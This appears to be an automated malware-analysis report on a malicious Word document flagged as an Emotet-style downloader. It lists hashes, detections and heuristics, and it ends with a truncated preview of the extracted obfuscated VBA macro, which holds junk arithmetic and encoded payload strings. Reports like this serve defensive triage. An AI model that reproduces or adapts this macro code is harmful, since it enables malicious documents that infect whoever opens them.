Office (OLE) malware analysis — malicious · 9ca396826841b3f1

MALICIOUS

Office (OLE)

163.0 KB Created: 2018-03-29 20:59:00 Authoring application: Microsoft Office Word First seen: 2018-04-12

MD5: 8983bc58c15554485b614ba78b9bb8b3 SHA-1: 352dcfcc0c30775994e186c69ff9d2e56d5f94d7 SHA-256: 9ca396826841b3f1a0a3183a6aecd744a5179fa83beefdcde3d86fc28b7dc8ba

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes CreateObject and appears to be obfuscated, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37980 bytes
SHA-256: `6218d1a7b8e6dbc4033402fdedc78ded3c9e9d80ee7e0e7fdaafa5dc432b9577`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 19 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OzPUjQsXtZD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zcvIrWGQsTXUK" Function nHAKuWPbNdP() On Error Resume Next rVzqTM = 79078 / Round(VlDCw) + HzjCsA - CStr(33129) * qnZXnB * DKhWt * ZrKEcq * RicIjR XsTzi = siMRw EjYIXMsbau = kVwSW("mAMAAyAGQAMgBlAGUAMwA1ADcAMQA1ADcANwA5AGUAOQAxAGIAMQAzADgAZgBhADYAYwA1ADUAYwA1AGEAZQBkADMAkuKmil", 2, 89) niSaV = 62729 / Round(wiGWz) + JfhLK - CStr(32503) * VwwLrj * htuitI * DDzEG * bUXRVV UjKTBA = DrjHi qiJvFN = 63661 / Round(OwuSaI) + UhwWrH - CStr(87633) * TzmaN * dTcKU * AIaOz * DYQAp czhim = Aqzcq CUspZEi = kVwSW("BqUAOABjADEAYwBiADgAMohrM", 3, 18) TmTXkd = 33418 / Round(FnlMG) + WaDVpS - CStr(16680) * wPbwj * JiYYS * vMwjnn * hKpMUY zZmbm = pzoEw nbDCF = 48646 / Round(rruoW) + TwJYaE - CStr(58092) * KcMYj * HzwJh * XaIOY * Rcutts dYfXjF = iWdwqd uAwYCBR = kVwSW("KBJqkAA0ADgAOAA1AGYAZQAwAGIAMgAwADkAOABiAGMAYQBiADIANQBmADMAYQAzAGQAMgA3AGIANAAzAD6l", 6, 77) EEsvk = 14744 / Round(Htpuz) + mBHRjU - CStr(68572) * wbbQD * hAzJY * UNXBzI * iVfqdj ocPLP = tWHcQ CGbuF = 31214 / Round(INCSW) + wdrba - CStr(73044) * zuOoq * klVLSa * jhSvOf * qFGjC ZCZcDw = hUIrm DGKSldIl = kVwSW("Hu8dQA0AGYAYgA5ADcAZQA0AGIAYQBhAGMAZgA3ADAANAA5AGMANgBhAGUAZAA2ADQAYQBlADkAYQBhAGEANgBuRP", 5, 81) PfbnC = 70810 / Round(iqRLwN) + hjsnhm - CStr(22468) * iLsHT * GOYaI * QYPRE * KwjlOj DYwcVK = szwPvu cqhik = 34584 / Round(lpzbho) + cLCREJ - CStr(26662) * LiJwL * ijrwz * BLtnF * ctvNF OvidqI = JGZiwV zkRtm = kVwSW("EBOgAzADYAMAA4AGMAYgAxAGYAZgBkADEAOQA3ADkAZgAyADIAYwBjADYAMABmAGIAMwBlADgANgA4AGQANgAwAGMAMQBmADkAMAA2ADEAYwBhADIAYQBiADgANQA3ADIE kuMM", 4, 126) GaDFHi = 64127 / Round(dQSOLh) + UIzcVj - CStr(29969) * FtjzqH * huSUPC * pGaGoR * LbzRc QjWzBr = wMYjqT OLDjN = 59805 / Round(njvtmX) + vpBhGj - CStr(36754) * fNjiL * wHGTO * bXuuLN * AFOOO HwPlw = fwFfq omYowNwvPL = kVwSW("l8@GXYANgBhAGQAYgA0AGQAYgBlAGEAYwA1AGQAZQBiADkAMQAxADIAMABjAGEAZgA0ADcANABhADgAZgAyADEAYgBjADQAMgAxADMAaSS", 6, 98) iTiob = 78835 / Round(YowYu) + WsTSC - CStr(33893) * UaEWiW * uimWr * tculM * ZoqPIa dcjMd = OrfIO BdwPB = 69263 / Round(zfsmoI) + NXNQPL - CStr(82549) * hTXswR * QYWiV * XzDKHk * maGUu lCFok = JKwirJ vdsGVtF = kVwSW("OOS5kZUAMQA0ADYAYQAyAGMAMAAxADIAMw@R", 7, 28) KpOUPK = 75520 / Round(pYJFHb) + EGMCzw - CStr(60838) * LjlqL * bULBW * NXGrK * Bwivi MVGqRp = mfjDl zRWQU = 86814 / Round(vHZVtw) + fjsAs - CStr(13261) * bWPqB * OJnvI * tIWOF * tcirB IKZjwQ = TTzYu jwIZGfDD = kVwSW("N,lqNANABlADMAMgBhAGEANwA0ADgANwAxADQBEiu", 6, 32) ZSsZl = 39378 / Round(MdEMJV) + fziWjV - CStr(41131) * rbiNXv * wwkcHf * ACwXY * iFNXad UoboZ = sbRrXz UZYhwv = 34782 / Round(aYwmj) + nXhFXJ - CStr(11068) * VArGw * pVRiB * KLiaEi * KDTWO jOPZai = XIDYpr RFQiQhVR = kVwSW("u MOZFgBlADYANABlADMAYgBhAGQAZQAzADkANAA5ADgANwAyADMANQAwAGQAOQA3AGMAOQBlAGYAOAA2ADQANgA3AGEAMwA0ADIAOAA0AGQANQBiADEANwA5AGMANwAwADEAMABiAGEAYQAzAGEAOQA3AGMANQBhAGEAMgA0AGYAMwAzADEAMgA5ADUANwBiAGUAMQA5qqa", 7, 195) RfEHQk = 11623 / Round(bsGAs) + vJCidY - CStr(24635) * awrzXD * IGlMj * fzLFi * OmWSZp bwAtMT = iFHPQM aPOzrK = 43348 / Round(vZOzi) + wjJJAq - CStr(22592) * VWPljz * zjwRaE * AMimY * NQDwB YVVKjq = ctsiG WsXzv = kVwSW("SP0BlADUAZAA5ADgAMgBmADUANQAxAGEAYwAwADQAZgBlADUAYwA5ADcAOQBiADQAYQBmAGMANABhAGMAMAA5AGIAYQBhAGIAYwA3ADEAZgAyADgANQBkAGUAOQA0ADMAMAAxAGYAMwAzADYAMQBjADYAZgAwADgAZQAzsIJmZ", 4, 162) WWwsSj = 13913 / Round(mjwbOR) + kETSk - CStr(73436) * PdVPbG * SIibIB * RYlQtM * pYjSYS oYQWrv = SWCFA wCktj = 19640 / Round(szZww) + jQdHjk - CStr(53919) * BpXwXD * sWjAlX * iUJdM * wFUqL lOUjQh = hwMMvL TzErIzXbqq = kVwSW("r JXAGQAMABkADAAZgA2ADMANwAzADgAOAA1AGIAYgBhAGQAMQBlADAANABiAGMANABiAGUANwA3ADIAMAA0ADQAYgAxADYANwA0ASR", 5, 97) szcqw = 24497 / Round(TiJwCX) + ivVhn - CStr(78764) * OXnSS * pTWHOR * czcir * FSfLkN mCArf = Xodbp BcPwR = 71116 / Round(nmGcFG) + pmOSl - CStr(7 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.